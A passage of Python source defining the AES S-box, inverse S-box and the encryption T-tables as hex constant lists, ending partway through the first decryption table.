S = [ 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 ]
Si =[ 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d ]
# Transformations for encryption
T1 = [ 0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d, 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554, 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d, 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a, 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87, 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b, 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea, 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b, 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a, 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f, 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108, 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f, 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e, 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5, 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d, 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f, 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e, 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb, 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce, 0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497, 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c, 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed, 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b, 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a, 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16, 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594, 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81, 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3, 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a, 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504, 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163, 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d, 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f, 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739, 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47, 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395, 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f, 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883, 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c, 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76, 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e, 0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4, 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6, 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b, 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7, 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0, 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25, 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818, 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72, 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651, 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21, 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85, 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa, 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12, 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0, 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9, 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133, 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7, 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920, 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a, 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17, 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8, 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11, 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a ]
T2 = [ 0xa5c66363, 0x84f87c7c, 0x99ee7777, 0x8df67b7b, 0x0dfff2f2, 0xbdd66b6b, 0xb1de6f6f, 0x5491c5c5, 0x50603030, 0x03020101, 0xa9ce6767, 0x7d562b2b, 0x19e7fefe, 0x62b5d7d7, 0xe64dabab, 0x9aec7676, 0x458fcaca, 0x9d1f8282, 0x4089c9c9, 0x87fa7d7d, 0x15effafa, 0xebb25959, 0xc98e4747, 0x0bfbf0f0, 0xec41adad, 0x67b3d4d4, 0xfd5fa2a2, 0xea45afaf, 0xbf239c9c, 0xf753a4a4, 0x96e47272, 0x5b9bc0c0, 0xc275b7b7, 0x1ce1fdfd, 0xae3d9393, 0x6a4c2626, 0x5a6c3636, 0x417e3f3f, 0x02f5f7f7, 0x4f83cccc, 0x5c683434, 0xf451a5a5, 0x34d1e5e5, 0x08f9f1f1, 0x93e27171, 0x73abd8d8, 0x53623131, 0x3f2a1515, 0x0c080404, 0x5295c7c7, 0x65462323, 0x5e9dc3c3, 0x28301818, 0xa1379696, 0x0f0a0505, 0xb52f9a9a, 0x090e0707, 0x36241212, 0x9b1b8080, 0x3ddfe2e2, 0x26cdebeb, 0x694e2727, 0xcd7fb2b2, 0x9fea7575, 0x1b120909, 0x9e1d8383, 0x74582c2c, 0x2e341a1a, 0x2d361b1b, 0xb2dc6e6e, 0xeeb45a5a, 0xfb5ba0a0, 0xf6a45252, 0x4d763b3b, 0x61b7d6d6, 0xce7db3b3, 0x7b522929, 0x3edde3e3, 0x715e2f2f, 0x97138484, 0xf5a65353, 0x68b9d1d1, 0x00000000, 0x2cc1eded, 0x60402020, 0x1fe3fcfc, 0xc879b1b1, 0xedb65b5b, 0xbed46a6a, 0x468dcbcb, 0xd967bebe, 0x4b723939, 0xde944a4a, 0xd4984c4c, 0xe8b05858, 0x4a85cfcf, 0x6bbbd0d0, 0x2ac5efef, 0xe54faaaa, 0x16edfbfb, 0xc5864343, 0xd79a4d4d, 0x55663333, 0x94118585, 0xcf8a4545, 0x10e9f9f9, 0x06040202, 0x81fe7f7f, 0xf0a05050, 0x44783c3c, 0xba259f9f, 0xe34ba8a8, 0xf3a25151, 0xfe5da3a3, 0xc0804040, 0x8a058f8f, 0xad3f9292, 0xbc219d9d, 0x48703838, 0x04f1f5f5, 0xdf63bcbc, 0xc177b6b6, 0x75afdada, 0x63422121, 0x30201010, 0x1ae5ffff, 0x0efdf3f3, 0x6dbfd2d2, 0x4c81cdcd, 0x14180c0c, 0x35261313, 0x2fc3ecec, 0xe1be5f5f, 0xa2359797, 0xcc884444, 0x392e1717, 0x5793c4c4, 0xf255a7a7, 0x82fc7e7e, 0x477a3d3d, 0xacc86464, 0xe7ba5d5d, 0x2b321919, 0x95e67373, 0xa0c06060, 0x98198181, 0xd19e4f4f, 0x7fa3dcdc, 0x66442222, 0x7e542a2a, 0xab3b9090, 0x830b8888, 0xca8c4646, 0x29c7eeee, 0xd36bb8b8, 0x3c281414, 0x79a7dede, 0xe2bc5e5e, 0x1d160b0b, 0x76addbdb, 0x3bdbe0e0, 0x56643232, 0x4e743a3a, 0x1e140a0a, 0xdb924949, 0x0a0c0606, 0x6c482424, 0xe4b85c5c, 0x5d9fc2c2, 0x6ebdd3d3, 0xef43acac, 0xa6c46262, 0xa8399191, 0xa4319595, 0x37d3e4e4, 0x8bf27979, 0x32d5e7e7, 0x438bc8c8, 0x596e3737, 0xb7da6d6d, 0x8c018d8d, 0x64b1d5d5, 0xd29c4e4e, 0xe049a9a9, 0xb4d86c6c, 0xfaac5656, 0x07f3f4f4, 0x25cfeaea, 0xafca6565, 0x8ef47a7a, 0xe947aeae, 0x18100808, 0xd56fbaba, 0x88f07878, 0x6f4a2525, 0x725c2e2e, 0x24381c1c, 0xf157a6a6, 0xc773b4b4, 0x5197c6c6, 0x23cbe8e8, 0x7ca1dddd, 0x9ce87474, 0x213e1f1f, 0xdd964b4b, 0xdc61bdbd, 0x860d8b8b, 0x850f8a8a, 0x90e07070, 0x427c3e3e, 0xc471b5b5, 0xaacc6666, 0xd8904848, 0x05060303, 0x01f7f6f6, 0x121c0e0e, 0xa3c26161, 0x5f6a3535, 0xf9ae5757, 0xd069b9b9, 0x91178686, 0x5899c1c1, 0x273a1d1d, 0xb9279e9e, 0x38d9e1e1, 0x13ebf8f8, 0xb32b9898, 0x33221111, 0xbbd26969, 0x70a9d9d9, 0x89078e8e, 0xa7339494, 0xb62d9b9b, 0x223c1e1e, 0x92158787, 0x20c9e9e9, 0x4987cece, 0xffaa5555, 0x78502828, 0x7aa5dfdf, 0x8f038c8c, 0xf859a1a1, 0x80098989, 0x171a0d0d, 0xda65bfbf, 0x31d7e6e6, 0xc6844242, 0xb8d06868, 0xc3824141, 0xb0299999, 0x775a2d2d, 0x111e0f0f, 0xcb7bb0b0, 0xfca85454, 0xd66dbbbb, 0x3a2c1616 ]
T3 = [ 0x63a5c663, 0x7c84f87c, 0x7799ee77, 0x7b8df67b, 0xf20dfff2, 0x6bbdd66b, 0x6fb1de6f, 0xc55491c5, 0x30506030, 0x01030201, 0x67a9ce67, 0x2b7d562b, 0xfe19e7fe, 0xd762b5d7, 0xabe64dab, 0x769aec76, 0xca458fca, 0x829d1f82, 0xc94089c9, 0x7d87fa7d, 0xfa15effa, 0x59ebb259, 0x47c98e47, 0xf00bfbf0, 0xadec41ad, 0xd467b3d4, 0xa2fd5fa2, 0xafea45af, 0x9cbf239c, 0xa4f753a4, 0x7296e472, 0xc05b9bc0, 0xb7c275b7, 0xfd1ce1fd, 0x93ae3d93, 0x266a4c26, 0x365a6c36, 0x3f417e3f, 0xf702f5f7, 0xcc4f83cc, 0x345c6834, 0xa5f451a5, 0xe534d1e5, 0xf108f9f1, 0x7193e271, 0xd873abd8, 0x31536231, 0x153f2a15, 0x040c0804, 0xc75295c7, 0x23654623, 0xc35e9dc3, 0x18283018, 0x96a13796, 0x050f0a05, 0x9ab52f9a, 0x07090e07, 0x12362412, 0x809b1b80, 0xe23ddfe2, 0xeb26cdeb, 0x27694e27, 0xb2cd7fb2, 0x759fea75, 0x091b1209, 0x839e1d83, 0x2c74582c, 0x1a2e341a, 0x1b2d361b, 0x6eb2dc6e, 0x5aeeb45a, 0xa0fb5ba0, 0x52f6a452, 0x3b4d763b, 0xd661b7d6, 0xb3ce7db3, 0x297b5229, 0xe33edde3, 0x2f715e2f, 0x84971384, 0x53f5a653, 0xd168b9d1, 0x00000000, 0xed2cc1ed, 0x20604020, 0xfc1fe3fc, 0xb1c879b1, 0x5bedb65b, 0x6abed46a, 0xcb468dcb, 0xbed967be, 0x394b7239, 0x4ade944a, 0x4cd4984c, 0x58e8b058, 0xcf4a85cf, 0xd06bbbd0, 0xef2ac5ef, 0xaae54faa, 0xfb16edfb, 0x43c58643, 0x4dd79a4d, 0x33556633, 0x85941185, 0x45cf8a45, 0xf910e9f9, 0x02060402, 0x7f81fe7f, 0x50f0a050, 0x3c44783c, 0x9fba259f, 0xa8e34ba8, 0x51f3a251, 0xa3fe5da3, 0x40c08040, 0x8f8a058f, 0x92ad3f92, 0x9dbc219d, 0x38487038, 0xf504f1f5, 0xbcdf63bc, 0xb6c177b6, 0xda75afda, 0x21634221, 0x10302010, 0xff1ae5ff, 0xf30efdf3, 0xd26dbfd2, 0xcd4c81cd, 0x0c14180c, 0x13352613, 0xec2fc3ec, 0x5fe1be5f, 0x97a23597, 0x44cc8844, 0x17392e17, 0xc45793c4, 0xa7f255a7, 0x7e82fc7e, 0x3d477a3d, 0x64acc864, 0x5de7ba5d, 0x192b3219, 0x7395e673, 0x60a0c060, 0x81981981, 0x4fd19e4f, 0xdc7fa3dc, 0x22664422, 0x2a7e542a, 0x90ab3b90, 0x88830b88, 0x46ca8c46, 0xee29c7ee, 0xb8d36bb8, 0x143c2814, 0xde79a7de, 0x5ee2bc5e, 0x0b1d160b, 0xdb76addb, 0xe03bdbe0, 0x32566432, 0x3a4e743a, 0x0a1e140a, 0x49db9249, 0x060a0c06, 0x246c4824, 0x5ce4b85c, 0xc25d9fc2, 0xd36ebdd3, 0xacef43ac, 0x62a6c462, 0x91a83991, 0x95a43195, 0xe437d3e4, 0x798bf279, 0xe732d5e7, 0xc8438bc8, 0x37596e37, 0x6db7da6d, 0x8d8c018d, 0xd564b1d5, 0x4ed29c4e, 0xa9e049a9, 0x6cb4d86c, 0x56faac56, 0xf407f3f4, 0xea25cfea, 0x65afca65, 0x7a8ef47a, 0xaee947ae, 0x08181008, 0xbad56fba, 0x7888f078, 0x256f4a25, 0x2e725c2e, 0x1c24381c, 0xa6f157a6, 0xb4c773b4, 0xc65197c6, 0xe823cbe8, 0xdd7ca1dd, 0x749ce874, 0x1f213e1f, 0x4bdd964b, 0xbddc61bd, 0x8b860d8b, 0x8a850f8a, 0x7090e070, 0x3e427c3e, 0xb5c471b5, 0x66aacc66, 0x48d89048, 0x03050603, 0xf601f7f6, 0x0e121c0e, 0x61a3c261, 0x355f6a35, 0x57f9ae57, 0xb9d069b9, 0x86911786, 0xc15899c1, 0x1d273a1d, 0x9eb9279e, 0xe138d9e1, 0xf813ebf8, 0x98b32b98, 0x11332211, 0x69bbd269, 0xd970a9d9, 0x8e89078e, 0x94a73394, 0x9bb62d9b, 0x1e223c1e, 0x87921587, 0xe920c9e9, 0xce4987ce, 0x55ffaa55, 0x28785028, 0xdf7aa5df, 0x8c8f038c, 0xa1f859a1, 0x89800989, 0x0d171a0d, 0xbfda65bf, 0xe631d7e6, 0x42c68442, 0x68b8d068, 0x41c38241, 0x99b02999, 0x2d775a2d, 0x0f111e0f, 0xb0cb7bb0, 0x54fca854, 0xbbd66dbb, 0x163a2c16 ]
T4 = [ 0x6363a5c6, 0x7c7c84f8, 0x777799ee, 0x7b7b8df6, 0xf2f20dff, 0x6b6bbdd6, 0x6f6fb1de, 0xc5c55491, 0x30305060, 0x01010302, 0x6767a9ce, 0x2b2b7d56, 0xfefe19e7, 0xd7d762b5, 0xababe64d, 0x76769aec, 0xcaca458f, 0x82829d1f, 0xc9c94089, 0x7d7d87fa, 0xfafa15ef, 0x5959ebb2, 0x4747c98e, 0xf0f00bfb, 0xadadec41, 0xd4d467b3, 0xa2a2fd5f, 0xafafea45, 0x9c9cbf23, 0xa4a4f753, 0x727296e4, 0xc0c05b9b, 0xb7b7c275, 0xfdfd1ce1, 0x9393ae3d, 0x26266a4c, 0x36365a6c, 0x3f3f417e, 0xf7f702f5, 0xcccc4f83, 0x34345c68, 0xa5a5f451, 0xe5e534d1, 0xf1f108f9, 0x717193e2, 0xd8d873ab, 0x31315362, 0x15153f2a, 0x04040c08, 0xc7c75295, 0x23236546, 0xc3c35e9d, 0x18182830, 0x9696a137, 0x05050f0a, 0x9a9ab52f, 0x0707090e, 0x12123624, 0x80809b1b, 0xe2e23ddf, 0xebeb26cd, 0x2727694e, 0xb2b2cd7f, 0x75759fea, 0x09091b12, 0x83839e1d, 0x2c2c7458, 0x1a1a2e34, 0x1b1b2d36, 0x6e6eb2dc, 0x5a5aeeb4, 0xa0a0fb5b, 0x5252f6a4, 0x3b3b4d76, 0xd6d661b7, 0xb3b3ce7d, 0x29297b52, 0xe3e33edd, 0x2f2f715e, 0x84849713, 0x5353f5a6, 0xd1d168b9, 0x00000000, 0xeded2cc1, 0x20206040, 0xfcfc1fe3, 0xb1b1c879, 0x5b5bedb6, 0x6a6abed4, 0xcbcb468d, 0xbebed967, 0x39394b72, 0x4a4ade94, 0x4c4cd498, 0x5858e8b0, 0xcfcf4a85, 0xd0d06bbb, 0xefef2ac5, 0xaaaae54f, 0xfbfb16ed, 0x4343c586, 0x4d4dd79a, 0x33335566, 0x85859411, 0x4545cf8a, 0xf9f910e9, 0x02020604, 0x7f7f81fe, 0x5050f0a0, 0x3c3c4478, 0x9f9fba25, 0xa8a8e34b, 0x5151f3a2, 0xa3a3fe5d, 0x4040c080, 0x8f8f8a05, 0x9292ad3f, 0x9d9dbc21, 0x38384870, 0xf5f504f1, 0xbcbcdf63, 0xb6b6c177, 0xdada75af, 0x21216342, 0x10103020, 0xffff1ae5, 0xf3f30efd, 0xd2d26dbf, 0xcdcd4c81, 0x0c0c1418, 0x13133526, 0xecec2fc3, 0x5f5fe1be, 0x9797a235, 0x4444cc88, 0x1717392e, 0xc4c45793, 0xa7a7f255, 0x7e7e82fc, 0x3d3d477a, 0x6464acc8, 0x5d5de7ba, 0x19192b32, 0x737395e6, 0x6060a0c0, 0x81819819, 0x4f4fd19e, 0xdcdc7fa3, 0x22226644, 0x2a2a7e54, 0x9090ab3b, 0x8888830b, 0x4646ca8c, 0xeeee29c7, 0xb8b8d36b, 0x14143c28, 0xdede79a7, 0x5e5ee2bc, 0x0b0b1d16, 0xdbdb76ad, 0xe0e03bdb, 0x32325664, 0x3a3a4e74, 0x0a0a1e14, 0x4949db92, 0x06060a0c, 0x24246c48, 0x5c5ce4b8, 0xc2c25d9f, 0xd3d36ebd, 0xacacef43, 0x6262a6c4, 0x9191a839, 0x9595a431, 0xe4e437d3, 0x79798bf2, 0xe7e732d5, 0xc8c8438b, 0x3737596e, 0x6d6db7da, 0x8d8d8c01, 0xd5d564b1, 0x4e4ed29c, 0xa9a9e049, 0x6c6cb4d8, 0x5656faac, 0xf4f407f3, 0xeaea25cf, 0x6565afca, 0x7a7a8ef4, 0xaeaee947, 0x08081810, 0xbabad56f, 0x787888f0, 0x25256f4a, 0x2e2e725c, 0x1c1c2438, 0xa6a6f157, 0xb4b4c773, 0xc6c65197, 0xe8e823cb, 0xdddd7ca1, 0x74749ce8, 0x1f1f213e, 0x4b4bdd96, 0xbdbddc61, 0x8b8b860d, 0x8a8a850f, 0x707090e0, 0x3e3e427c, 0xb5b5c471, 0x6666aacc, 0x4848d890, 0x03030506, 0xf6f601f7, 0x0e0e121c, 0x6161a3c2, 0x35355f6a, 0x5757f9ae, 0xb9b9d069, 0x86869117, 0xc1c15899, 0x1d1d273a, 0x9e9eb927, 0xe1e138d9, 0xf8f813eb, 0x9898b32b, 0x11113322, 0x6969bbd2, 0xd9d970a9, 0x8e8e8907, 0x9494a733, 0x9b9bb62d, 0x1e1e223c, 0x87879215, 0xe9e920c9, 0xcece4987, 0x5555ffaa, 0x28287850, 0xdfdf7aa5, 0x8c8c8f03, 0xa1a1f859, 0x89898009, 0x0d0d171a, 0xbfbfda65, 0xe6e631d7, 0x4242c684, 0x6868b8d0, 0x4141c382, 0x9999b029, 0x2d2d775a, 0x0f0f111e, 0xb0b0cb7b, 0x5454fca8, 0xbbbbd66d, 0x16163a2c ]
# Transformations for decryption
T5 = [ 0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96, 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393, 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25, 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f, 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1, 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6, 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da, 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844, 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd, 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4, 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45, 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94, 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7, 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a, 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5, 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c, 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1, 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a, 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75, 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051, 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46, 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff, 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77, 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb, 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000, 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e, 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927, 0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a, 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e, 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16, 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d, 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8, 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd, 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34, 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163, 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120, 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d, 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0, 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422, 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef, 0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36, 0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4, 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662, 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5, 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3, 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b, 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8, 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6, 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6, 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0, 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815, 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f, 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df, 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f, 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e, 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713, 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89, 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c, 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf, 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86, 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f, 0x161dc372, 0xbce2250c, 0x283c498b, 